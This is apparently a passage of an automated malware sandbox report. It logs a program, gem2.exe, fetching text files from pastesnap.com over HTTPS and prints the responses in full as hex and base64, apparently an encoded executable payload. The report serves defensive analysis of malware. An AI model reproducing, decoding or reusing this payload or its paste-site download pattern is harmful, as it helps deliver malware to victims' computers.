                                                              2025-01-12 08:26:20 UTC1369INData Raw: 51 6b 52 68 32 7a 76 2b 6f 41 35 47 6d 6d 4d 4d 4d 72 37 4d 4a 6c 38 4a 63 67 79 4c 4d 70 43 32 42 4f 55 2f 47 4e 34 71 63 38 50 63 75 70 59 33 4d 4c 35 2b 38 77 53 50 76 4b 43 71 64 70 31 7a 38 37 74 46 32 68 47 61 72 6f 68 64 2f 51 52 69 6d 78 58 7a 45 4c 46 43 35 66 2b 53 35 79 6a 67 57 53 62 47 2b 4e 4a 50 66 32 6b 6e 78 67 30 61 58 6f 43 6d 2f 55 31 76 42 6d 69 33 4b 42 6a 66 62 33 6c 48 35 75 34 78 37 4e 33 67 42 69 57 6c 47 78 30 39 30 66 67 36 6b 4e 6b 78 4d 45 35 41 2f 51 6a 62 6b 4e 6c 75 73 54 47 61 33 48 4e 44 55 7a 39 6e 51 4e 2f 6e 47 41 42 56 54 32 59 4c 68 45 37 58 6d 73 47 32 47 5a 6b 31 67 69 31 59 45 4d 77 77 6c 65 4a 67 6f 44 4c 30 68 70 4e 6c 61 37 46 47 36 47 78 69 73 73 71 42 69 79 46 34 35 44 77 54 43 65 58 2f 6d 66 5a 58 76 65 71
                                                              Data Ascii: QkRh2zv+oA5GmmMMMr7MJl8JcgyLMpC2BOU/GN4qc8PcupY3ML5+8wSPvKCqdp1z87tF2hGarohd/QRimxXzELFC5f+S5yjgWSbG+NJPf2knxg0aXoCm/U1vBmi3KBjfb3lH5u4x7N3gBiWlGx090fg6kNkxME5A/QjbkNlusTGa3HNDUz9nQN/nGABVT2YLhE7XmsG2GZk1gi1YEMwwleJgoDL0hpNla7FG6GxissqBiyF45DwTCeX/mfZXveq


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.749727104.21.60.1724432692C:\Users\user\Desktop\gem2.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-12 08:26:24 UTC110OUTGET /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              User-Agent: MyUserAgent
                                                              Host: pastesnap.com
                                                              Cache-Control: no-cache
                                                              2025-01-12 08:26:24 UTC916INHTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:24 GMT
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Sat, 11 Jan 2025 00:57:39 GMT
                                                              ETag: W/"804395cfc363db1:0"
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: ASP.NET
                                                              X-Powered-By-Plesk: PleskWin
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TDU4N4RSbVU4mP%2FD4u71qpe1bOlKiPgvz6CnZPGaUaKBiuq1WHg5eww5pH4tvrwvWRjFfM3QBeMlQct1VBMWg6OpLX4kioAvkxybDAzblAb%2FGg8IVs7GTb8btMw9y6b"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc2ecfed30f6d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1510&rtt_var=592&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=748&delivery_rate=1810291&cwnd=239&unsent_bytes=0&cid=7756634a8c4387b5&ts=722&x=0"
                                                              2025-01-12 08:26:24 UTC453INData Raw: 34 62 31 62 0d 0a 49 53 2f 2b 59 57 39 31 62 6d 46 6f 64 57 35 68 6b 34 70 75 59 64 52 31 62 6d 46 73 64 57 35 68 4c 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 37 48 56 75 59 57 4a 71 31 47 39 73 77 57 65 73 54 63 31 76 4c 61 46 55 4f 67 6b 46 42 6b 34 52 48 68 6f 4a 45 77 30 59 54 67 49 4e 47 77 41 4f 47 46 55 4d 42 45 77 48 47 77 39 4d 48 41 42 42 4b 44 6f 39 51 51 45 61 43 67 52 43 65 47 4e 72 53 48 56 75 59 57 78 31 62 6d 45 38 4d 47 35 68 43 50 4e 6e 59 57 69 31 37 77 5a 73 64 57 35 68 62 48 56 75 59 5a 78 31 54 47 46 6e 64 32 42 49 62 43 74 73 59 57 79 68 62 6d 46 73 64 57 35 68 4c 5a 49 66 59 57 78 6c 62 6d 46 73 64 57 34 68 62 58 56 75 59 57 78 6c 62
                                                              Data Ascii: 4b1bIS/+YW91bmFodW5hk4puYdR1bmFsdW5hLHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5h7HVuYWJq1G9swWesTc1vLaFUOgkFBk4RHhoJEw0YTgINGwAOGFUMBEwHGw9MHABBKDo9QQEaCgRCeGNrSHVuYWx1bmE8MG5hCPNnYWi17wZsdW5hbHVuYZx1TGFnd2BIbCtsYWyhbmFsdW5hLZIfYWxlbmFsdW4hbXVuYWxlb
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 68 78 4b 77 66 59 55 52 31 62 6d 47 63 50 71 39 68 4c 48 52 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 4e 55 65 59 61 78 32 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 43 41 51 73 5a 47 48 56 75 59 65 51 70 62 47 46 73 5a 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 4d 64 57 34 42 51 67 63 4b 41 42 67 55 62 6d 45 30 31 32 35 68 62 41 56 73 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 4c 48 56 75 49 55 49 52 44 78 55 4e 64 57 35 68 4c 47 5a 75 59 57 78 56 62 57 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 53 78 31 62 71 46 43 42 51 6f 41 47 42 52 75 59 63 68 6a 62 6d 46 73 4e 57
                                                              Data Ascii: hxKwfYUR1bmGcPq9hLHRuYWx1bmFsdW5hbNUeYax2bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFCAQsZGHVuYeQpbGFsZW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFMdW4BQgcKABgUbmE0125hbAVsYWx1bmFsdW5hbHVuYWx1bmFsdW5hLHVuIUIRDxUNdW5hLGZuYWxVbWFsdW5hbHVuYWx1bmFsdW5hbHVuYSx1bqFCBQoAGBRuYchjbmFsNW
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 31 57 46 73 64 57 35 68 39 41 76 56 59 57 78 31 62 6d 47 79 6d 74 4a 68 62 48 56 75 59 54 53 35 30 32 46 73 64 57 35 68 34 75 50 53 59 57 78 31 62 6d 46 34 4d 39 4e 68 62 48 56 75 59 54 6a 6b 72 6d 46 73 64 57 35 68 4f 6f 4c 55 59 57 78 31 62 6d 48 4b 36 74 56 68 62 48 56 75 59 61 70 56 30 6d 46 73 64 57 35 68 50 49 72 53 59 57 78 31 62 6d 47 34 55 4b 35 68 62 48 56 75 59 64 70 61 30 57 46 73 64 57 35 68 56 47 4c 51 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 63 30 57 46 73 64 57 35 68 45 49 2f 53 59 57 78 31 62 6d 45 38 59 74 4a 68 62 48 56 75 59 5a 59 71 48 32 46 73 64 57 35 68 75 73 50 56 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 59 49 6e 72 6d 46 73 64 57 35 68 35 71 63 66 59 57 78 31 62 6d 47 67 41 64 56 68 62 48 56 75 59 52 49
                                                              Data Ascii: 1WFsdW5h9AvVYWx1bmGymtJhbHVuYTS502FsdW5h4uPSYWx1bmF4M9NhbHVuYTjkrmFsdW5hOoLUYWx1bmHK6tVhbHVuYapV0mFsdW5hPIrSYWx1bmG4UK5hbHVuYdpa0WFsdW5hVGLQYWx1bmFsdW5hbHVuYWxc0WFsdW5hEI/SYWx1bmE8YtJhbHVuYZYqH2FsdW5husPVYWx1bmFsdW5hbHVuYYInrmFsdW5h5qcfYWx1bmGgAdVhbHVuYRI
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 52 38 5a 7a 30 57 6c 43 58 38 46 68 50 6b 2f 33 52 77 42 74 32 30 73 38 64 66 46 74 46 48 33 4a 58 56 42 74 6f 31 38 57 56 39 64 7a 4a 6e 2f 65 4c 31 37 76 35 6f 76 77 64 55 49 6a 57 73 66 73 68 42 68 35 65 43 79 4b 36 67 71 33 31 45 56 38 4c 49 7a 78 36 70 6f 4b 55 33 34 76 51 6c 6b 4a 72 72 51 6e 35 4f 4b 4d 33 33 70 42 31 70 70 31 71 61 79 65 6f 4d 42 62 6d 46 73 64 65 34 63 2b 63 35 2b 75 76 56 41 4d 5a 64 46 31 41 47 6d 64 77 30 68 53 78 38 52 54 45 69 4e 66 78 78 75 78 6b 5a 30 64 45 68 42 5a 71 45 30 72 61 2b 75 4e 2f 37 71 4f 37 37 71 57 6d 42 73 64 57 36 5a 2b 55 65 4e 4a 53 31 30 62 6d 46 78 61 79 78 72 79 50 6a 73 78 31 58 79 2b 44 79 32 41 35 41 78 46 52 4d 68 50 47 6c 5a 58 58 75 79 75 2b 42 44 2b 7a 49 36 67 51 75 2b 4f 31 72 47 67 62 5a 42
                                                              Data Ascii: R8Zz0WlCX8FhPk/3RwBt20s8dfFtFH3JXVBto18WV9dzJn/eL17v5ovwdUIjWsfshBh5eCyK6gq31EV8LIzx6poKU34vQlkJrrQn5OKM33pB1pp1qayeoMBbmFsde4c+c5+uvVAMZdF1AGmdw0hSx8RTEiNfxxuxkZ0dEhBZqE0ra+uN/7qO77qWmBsdW6Z+UeNJS10bmFxayxryPjsx1Xy+Dy2A5AxFRMhPGlZXXuyu+BD+zI6gQu+O1rGgbZB
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 6e 66 4c 72 6c 54 77 6b 7a 38 67 66 64 4f 48 70 50 46 4c 46 73 42 70 36 61 68 6b 78 4b 45 52 42 48 51 5a 72 46 37 69 72 58 50 4c 36 50 4c 6b 4a 36 54 63 49 71 38 74 67 51 6b 7a 6e 32 77 52 71 72 6d 52 41 6f 73 77 67 34 4b 6f 44 59 61 66 43 6b 4f 39 4b 34 4b 41 32 52 36 71 70 4b 4b 6b 5a 35 54 37 68 6d 62 48 6b 6b 4b 77 36 5a 42 34 72 75 50 67 58 4a 44 35 79 46 44 4f 2f 38 4a 79 30 4f 33 47 59 74 4c 37 71 6c 62 36 33 34 42 41 79 74 50 4d 65 48 47 4e 36 50 6b 6e 48 70 78 35 6d 61 33 63 33 4f 73 48 65 6e 5a 44 6b 39 54 45 2b 78 74 6b 52 61 4f 65 47 73 38 58 4a 72 42 5a 72 48 5a 4f 36 48 66 6b 6f 71 52 6c 32 7a 74 67 43 51 53 59 50 67 4c 64 67 45 4c 72 4e 46 70 46 62 67 72 74 57 77 74 4f 79 31 79 55 51 50 6d 79 49 4b 6a 35 59 4b 50 78 76 4f 33 31 44 52 6f 58
                                                              Data Ascii: nfLrlTwkz8gfdOHpPFLFsBp6ahkxKERBHQZrF7irXPL6PLkJ6TcIq8tgQkzn2wRqrmRAoswg4KoDYafCkO9K4KA2R6qpKKkZ5T7hmbHkkKw6ZB4ruPgXJD5yFDO/8Jy0O3GYtL7qlb634BAytPMeHGN6PknHpx5ma3c3OsHenZDk9TE+xtkRaOeGs8XJrBZrHZO6HfkoqRl2ztgCQSYPgLdgELrNFpFbgrtWwtOy1yUQPmyIKj5YKPxvO31DRoX
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 6c 46 63 6d 73 48 6d 46 73 64 57 34 67 76 4b 2b 70 2b 37 34 4d 47 79 6b 4e 43 38 6a 42 52 5a 50 78 69 53 33 72 47 43 6e 4e 61 2b 6b 42 56 51 74 49 6c 47 31 76 70 42 42 33 42 61 61 46 76 65 38 63 6a 33 2b 61 5a 6c 56 31 49 46 54 6e 42 2f 49 57 67 76 57 58 4c 50 38 76 61 67 61 46 62 62 68 54 6e 4e 55 46 4c 6d 42 73 64 57 34 46 77 53 65 58 4e 4e 53 6c 51 4f 59 30 39 65 69 2b 39 4e 54 59 54 79 52 31 77 44 61 4d 66 56 67 75 56 50 57 34 4c 73 51 30 6b 4a 61 55 52 4c 42 48 66 48 78 41 78 68 45 68 74 6a 62 67 6f 39 4e 6b 52 57 6d 35 6e 69 68 62 57 34 54 46 32 57 37 2b 7a 2f 74 62 56 4b 55 78 49 65 59 33 38 33 54 73 62 5a 46 6d 45 39 6e 4d 48 69 46 74 64 57 35 68 51 4a 42 30 30 42 5a 56 42 71 63 44 78 55 59 76 65 79 55 58 42 37 4e 39 6e 79 64 54 50 61 37 76 43 36
                                                              Data Ascii: lFcmsHmFsdW4gvK+p+74MGykNC8jBRZPxiS3rGCnNa+kBVQtIlG1vpBB3BaaFve8cj3+aZlV1IFTnB/IWgvWXLP8vagaFbbhTnNUFLmBsdW4FwSeXNNSlQOY09ei+9NTYTyR1wDaMfVguVPW4LsQ0kJaURLBHfHxAxhEhtjbgo9NkRWm5nihbW4TF2W7+z/tbVKUxIeY383TsbZFmE9nMHiFtdW5hQJB00BZVBqcDxUYveyUXB7N9nydTPa7vC6
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 4f 4b 77 59 66 38 33 4f 57 69 32 50 6c 47 42 4c 43 53 69 75 30 6f 75 52 6e 6d 70 31 42 32 63 73 43 65 34 4e 68 2b 62 74 69 73 30 75 67 70 72 67 78 69 34 71 70 56 51 56 45 58 35 58 6d 34 52 78 70 72 57 71 6b 6f 71 52 6e 74 35 4f 67 46 49 64 79 35 43 65 6b 36 73 4e 4c 57 2b 35 73 6b 68 4a 33 70 46 74 50 2b 58 73 5a 39 58 62 4b 6e 77 33 50 36 75 55 6b 78 4f 37 52 65 42 31 34 5a 32 2b 44 70 70 72 68 67 65 4a 41 51 55 57 45 41 4a 48 76 65 65 44 4e 6e 54 31 77 66 6b 70 33 62 76 5a 61 78 78 65 36 36 51 32 39 71 4e 38 6a 37 34 72 56 4c 59 4f 53 2f 7a 65 78 6c 4b 73 33 71 36 36 39 71 43 6a 76 2f 6f 76 4a 75 69 38 76 72 34 34 64 5a 32 75 61 6c 77 53 78 64 68 56 76 62 6b 32 59 50 75 7a 52 57 63 77 71 50 56 75 74 2f 38 36 78 47 65 62 6e 51 62 31 65 37 57 72 44 37 41
                                                              Data Ascii: OKwYf83OWi2PlGBLCSiu0ouRnmp1B2csCe4Nh+btis0ugprgxi4qpVQVEX5Xm4RxprWqkoqRnt5OgFIdy5Cek6sNLW+5skhJ3pFtP+XsZ9XbKnw3P6uUkxO7ReB14Z2+DpprhgeJAQUWEAJHveeDNnT1wfkp3bvZaxxe66Q29qN8j74rVLYOS/zexlKs3q669qCjv/ovJui8vr44dZ2ualwSxdhVvbk2YPuzRWcwqPVut/86xGebnQb1e7WrD7A
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 35 4b 4b 6b 57 66 42 63 43 57 42 74 7a 32 73 63 58 56 7a 4c 6d 30 54 36 6f 69 71 6b 6f 71 52 6e 73 57 64 58 71 4c 6a 35 78 57 6c 51 48 2f 34 6c 51 42 2f 2f 4e 69 64 65 6e 33 35 58 43 6e 56 79 6b 34 43 30 4a 2b 54 69 73 51 42 49 73 42 42 31 72 30 38 67 4e 34 36 6b 58 4b 64 68 4d 56 47 4c 38 74 74 6e 2b 37 2f 76 6a 31 55 77 58 38 31 30 79 79 73 35 69 41 5a 43 67 78 65 52 71 64 63 79 2b 63 35 49 78 5a 73 64 57 37 68 45 33 74 71 65 47 69 42 33 33 76 70 67 37 59 77 70 4e 63 4c 4c 42 74 31 62 6d 46 73 66 61 54 71 42 4c 45 42 66 4c 71 4c 58 49 34 4c 58 4f 2b 75 35 56 41 68 6c 30 30 74 51 52 62 64 62 43 6b 2f 46 5a 56 70 54 31 32 38 6b 55 5a 4e 2f 54 6c 2f 4c 36 4e 48 30 4c 73 36 53 68 33 35 58 36 31 51 78 49 77 50 5a 6f 4a 70 36 37 55 67 58 39 7a 34 72 58 32 4a
                                                              Data Ascii: 5KKkWfBcCWBtz2scXVzLm0T6oiqkoqRnsWdXqLj5xWlQH/4lQB//Niden35XCnVyk4C0J+TisQBIsBB1r08gN46kXKdhMVGL8ttn+7/vj1UwX810yys5iAZCgxeRqdcy+c5IxZsdW7hE3tqeGiB33vpg7YwpNcLLBt1bmFsfaTqBLEBfLqLXI4LXO+u5VAhl00tQRbdbCk/FZVpT128kUZN/Tl/L6NH0Ls6Sh35X61QxIwPZoJp67UgX9z4rX2J
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 39 4a 37 7a 71 4f 38 74 47 68 62 5a 56 59 4a 43 69 65 62 48 56 75 36 58 73 71 4c 6d 6b 6f 58 72 6b 37 58 51 6e 36 79 31 34 78 67 54 4c 4b 4b 77 61 41 51 75 4f 75 69 4a 71 4b 6e 6f 69 69 49 31 36 34 43 6b 75 57 4d 57 4c 53 46 73 47 34 37 50 76 6c 66 4f 37 57 49 2f 42 69 65 66 6c 66 65 54 30 37 47 6c 61 56 69 68 4c 49 31 47 51 4a 59 50 46 45 7a 74 74 58 77 48 4b 6b 4e 62 4a 59 2b 43 41 6f 6d 6a 4e 6e 6b 6e 57 62 65 39 39 53 39 43 44 56 56 45 4b 55 6b 57 64 32 6a 64 73 45 38 36 73 74 32 61 4d 4b 38 4c 43 46 30 64 48 4e 4d 69 55 47 6f 49 5a 54 71 31 6a 46 56 61 47 70 36 76 6b 59 56 6e 31 73 2b 6b 52 55 41 53 4b 55 73 4c 76 6f 4b 7a 54 73 67 7a 62 55 2b 41 2f 6f 77 70 5a 58 58 4d 4a 69 6c 6a 43 43 30 52 41 62 77 62 6f 4e 2b 2b 35 69 50 63 6f 54 42 76 4a 4f 34
                                                              Data Ascii: 9J7zqO8tGhbZVYJCiebHVu6XsqLmkoXrk7XQn6y14xgTLKKwaAQuOuiJqKnoiiI164CkuWMWLSFsG47PvlfO7WI/BieflfeT07GlaVihLI1GQJYPFEzttXwHKkNbJY+CAomjNnknWbe99S9CDVVEKUkWd2jdsE86st2aMK8LCF0dHNMiUGoIZTq1jFVaGp6vkYVn1s+kRUASKUsLvoKzTsgzbU+A/owpZXXMJiljCC0RAbwboN++5iPcoTBvJO4
                                                              2025-01-12 08:26:24 UTC1369INData Raw: 41 35 47 6d 6d 4d 4d 4d 72 37 4d 4a 6c 38 4a 63 67 79 4c 4d 70 43 32 42 4f 55 2f 47 4e 34 71 63 38 50 63 75 70 59 33 4d 4c 35 2b 38 77 53 50 76 4b 43 71 64 70 31 7a 38 37 74 46 32 68 47 61 72 6f 68 64 2f 51 52 69 6d 78 58 7a 45 4c 46 43 35 66 2b 53 35 79 6a 67 57 53 62 47 2b 4e 4a 50 66 32 6b 6e 78 67 30 61 58 6f 43 6d 2f 55 31 76 42 6d 69 33 4b 42 6a 66 62 33 6c 48 35 75 34 78 37 4e 33 67 42 69 57 6c 47 78 30 39 30 66 67 36 6b 4e 6b 78 4d 45 35 41 2f 51 6a 62 6b 4e 6c 75 73 54 47 61 33 48 4e 44 55 7a 39 6e 51 4e 2f 6e 47 41 42 56 54 32 59 4c 68 45 37 58 6d 73 47 32 47 5a 6b 31 67 69 31 59 45 4d 77 77 6c 65 4a 67 6f 44 4c 30 68 70 4e 6c 61 37 46 47 36 47 78 69 73 73 71 42 69 79 46 34 35 44 77 54 43 65 58 2f 6d 66 5a 58 76 65 71 45 6d 2f 36 43 43 4d 67 41
                                                              Data Ascii: A5GmmMMMr7MJl8JcgyLMpC2BOU/GN4qc8PcupY3ML5+8wSPvKCqdp1z87tF2hGarohd/QRimxXzELFC5f+S5yjgWSbG+NJPf2knxg0aXoCm/U1vBmi3KBjfb3lH5u4x7N3gBiWlGx090fg6kNkxME5A/QjbkNlusTGa3HNDUz9nQN/nGABVT2YLhE7XmsG2GZk1gi1YEMwwleJgoDL0hpNla7FG6GxissqBiyF45DwTCeX/mfZXveqEm/6CCMgA


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.749774104.21.60.1724432692C:\Users\user\Desktop\gem2.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-12 08:26:31 UTC110OUTGET /STB/cGFzdGVzbmFwR.txt HTTP/1.1
                                                              User-Agent: MyUserAgent
                                                              Host: pastesnap.com
                                                              Cache-Control: no-cache
                                                              2025-01-12 08:26:32 UTC922INHTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:32 GMT
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Mon, 30 Dec 2024 22:25:18 GMT
                                                              ETag: W/"01b94b495bdb1:0"
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: ASP.NET
                                                              X-Powered-By-Plesk: PleskWin
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XPpAu3BlDBteC%2FOmOPArMok1%2Bag4MfunF7ReTDxuu7H28UlZaR8jVoc%2FQ8%2Fr7g9%2FOUxfric4gHPyCmxRkbpyozv4QbUjXsJbWyzNvs6PaqbYlac%2B6BaGm59S8XSBKrdL"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc31dc9e5433d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1694&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=748&delivery_rate=1698662&cwnd=252&unsent_bytes=0&cid=c3aa89f02728970f&ts=373&x=0"
                                                              2025-01-12 08:26:32 UTC447INData Raw: 36 38 34 63 0d 0a 49 53 2f 2b 59 57 39 31 62 6d 46 6f 64 57 35 68 6b 34 70 75 59 64 52 31 62 6d 46 73 64 57 35 68 4c 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 68 48 56 75 59 51 51 48 31 47 39 73 77 57 65 73 54 63 31 76 4c 61 46 55 4f 67 6b 46 42 6b 34 52 48 68 6f 4a 45 77 30 59 54 67 49 4e 47 77 41 4f 47 46 55 4d 42 45 77 48 47 77 39 4d 48 41 42 42 4b 44 6f 39 51 51 45 61 43 67 52 43 65 47 4e 72 53 48 56 75 59 57 78 31 62 6d 48 72 2b 4c 77 79 72 35 6e 53 59 61 2b 5a 30 6d 47 76 6d 64 4a 68 35 4f 48 55 59 4b 36 5a 30 6d 48 6b 34 64 4e 67 6f 70 6e 53 59 61 2b 5a 30 32 48 4e 6d 64 4a 68 35 42 7a 61 59 4b 6d 5a 30 6d 48 6b 48 43 31 68 72 70 6e 53 59 61 2b 5a 52
                                                              Data Ascii: 684cIS/+YW91bmFodW5hk4puYdR1bmFsdW5hLHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hhHVuYQQH1G9swWesTc1vLaFUOgkFBk4RHhoJEw0YTgINGwAOGFUMBEwHGw9MHABBKDo9QQEaCgRCeGNrSHVuYWx1bmHr+Lwyr5nSYa+Z0mGvmdJh5OHUYK6Z0mHk4dNgopnSYa+Z02HNmdJh5BzaYKmZ0mHkHC1hrpnSYa+ZR
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 6d 46 73 5a 57 35 68 62 48 56 2b 59 57 78 6c 62 6d 46 73 64 57 35 68 66 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 50 45 78 75 59 52 52 31 62 6d 46 73 4e 57 35 68 56 43 39 73 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 31 57 78 68 6a 48 56 75 59 58 42 4e 62 6d 46 55 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 56 62 6d 48 6b 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 51 67 45 4c 47 52 68 31 62 6d 48 50 66 6d 35 68 62 47 56 75 59 57 78 35 62 6d 46 73 63 57 35 68 62 48 56 75 59 57 78 31 62 6d 46 73 64 57 35 68 54 48 56 75 41 55 49 48
                                                              Data Ascii: mFsZW5hbHV+YWxlbmFsdW5hfHVuYWx1bmFsdW5hPExuYRR1bmFsNW5hVC9sYWx1bmFsdW5hbHVuYWx1bmFs1WxhjHVuYXBNbmFUdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hbHVuYWxVbmHkdW5hbHVuYWx1bmFsdW5hbHVuYWx1bmFsdW5hQgELGRh1bmHPfm5hbGVuYWx5bmFscW5hbHVuYWx1bmFsdW5hTHVuAUIH
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 4e 58 46 4a 41 42 62 79 66 6e 73 7a 43 6f 72 79 44 6c 6a 65 32 5a 65 6d 42 73 64 65 50 6b 67 49 75 52 6e 71 76 77 67 70 2b 54 69 6e 70 67 62 48 55 2b 69 58 70 31 62 6d 47 54 70 65 75 68 46 48 6e 74 33 4a 79 4c 6b 5a 35 6d 62 71 34 68 70 62 5a 64 6f 61 57 32 42 73 46 4e 4e 57 36 65 65 56 46 4f 49 57 7a 77 72 68 56 68 48 63 4a 41 4c 48 55 2b 6e 6e 6c 5a 54 69 46 73 74 6c 32 68 72 79 44 6c 6a 65 32 5a 36 6d 46 73 64 54 30 33 35 30 41 32 51 53 78 31 58 62 6f 37 4a 4a 47 33 42 46 6c 4d 49 57 7a 38 4b 35 32 54 6f 2b 57 5a 42 47 46 4d 49 57 7a 38 45 36 32 54 6f 35 45 55 59 50 77 72 71 5a 4f 6a 42 75 31 4e 4e 57 37 6f 4b 62 47 52 74 77 54 6c 54 79 46 73 2f 43 75 68 6b 36 4d 39 4d 75 55 77 30 70 35 35 39 55 34 68 62 50 43 75 62 75 53 53 62 47 46 73 4a 6a 30 79 42
                                                              Data Ascii: NXFJABbyfnszCoryDlje2ZemBsdePkgIuRnqvwgp+TinpgbHU+iXp1bmGTpeuhFHnt3JyLkZ5mbq4hpbZdoaW2BsFNNW6eeVFOIWzwrhVhHcJALHU+nnlZTiFstl2hryDlje2Z6mFsdT0350A2QSx1Xbo7JJG3BFlMIWz8K52To+WZBGFMIWz8E62To5EUYPwrqZOjBu1NNW7oKbGRtwTlTyFs/Cuhk6M9MuUw0p559U4hbPCubuSSbGFsJj0yB
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 47 64 67 52 6e 50 79 59 45 6e 6a 2b 4b 65 78 56 4d 4e 57 37 6b 72 41 78 6c 58 48 56 30 62 2b 46 6a 38 49 56 68 62 48 58 6a 4a 4a 44 38 4d 35 30 38 48 65 5a 42 4c 48 55 45 59 44 38 64 78 6b 45 73 64 5a 46 30 46 46 55 75 59 65 6d 31 59 65 6d 6c 64 57 35 68 34 54 43 32 4d 5a 4e 67 4f 6b 45 73 64 65 32 4e 66 50 34 72 6e 65 65 4a 34 78 53 30 39 6f 4a 78 35 33 33 4c 78 4d 6e 51 35 5a 33 68 41 4c 62 69 67 47 58 4c 78 4d 6e 51 35 5a 33 68 41 4c 62 69 67 47 58 4c 78 4d 6e 51 35 5a 33 68 41 4c 59 78 79 64 44 4c 78 4a 4d 6b 52 75 53 73 44 52 6a 71 4b 59 6e 6a 4e 4a 67 6e 6b 52 53 45 2f 44 4f 56 35 33 30 2b 6e 6a 31 70 36 36 45 55 4b 75 55 6b 6d 50 67 37 6d 54 36 4b 47 34 33 6c 4b 4a 62 71 5a 43 57 52 4d 46 6a 77 72 68 6c 54 2b 43 75 70 50 49 70 37 4e 55 77 31 62 75
                                                              Data Ascii: GdgRnPyYEnj+KexVMNW7krAxlXHV0b+Fj8IVhbHXjJJD8M508HeZBLHUEYD8dxkEsdZF0FFUuYem1YemldW5h4TC2MZNgOkEsde2NfP4rneeJ4xS09oJx533LxMnQ5Z3hALbigGXLxMnQ5Z3hALbigGXLxMnQ5Z3hALYxydDLxJMkRuSsDRjqKYnjNJgnkRSE/DOV530+nj1p66EUKuUkmPg7mT6KG43lKJbqZCWRMFjwrhlT+CupPIp7NUw1bu
